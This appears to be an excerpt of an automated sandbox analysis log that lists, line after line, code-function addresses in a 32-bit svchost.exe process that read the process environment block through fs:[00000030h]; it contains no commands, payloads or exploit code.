Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]	2_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]	2_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]	2_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]	2_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]	2_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]	2_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]	2_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]	2_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]	2_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]	2_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]	2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]	2_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]	2_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]	2_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]	2_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]	2_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]	2_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]	2_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]	2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]	2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]	2_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]	2_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]	2_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]	2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]	2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]	2_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]	2_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]	2_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]	2_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]	2_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]	2_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]	2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]	2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]	2_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]	2_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]	2_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]	2_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]	2_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]	2_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]	2_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]	2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]	2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]	2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]	2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]	2_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]	2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]	2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]	2_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]	2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]	2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]	2_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]	2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]	2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]	2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]	2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]	2_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]	2_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]	2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]	2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]	2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]	2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]	2_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]	2_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]	2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]	2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]	2_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]	2_2_0306A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]	2_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]	2_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]	2_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]	2_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]	2_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]	2_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]	2_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]	2_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]	2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]	2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]	2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]	2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]	2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]	2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]	2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]	2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]	2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]	2_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]	2_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]	2_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]	2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]	2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]	2_2_0305EBFC
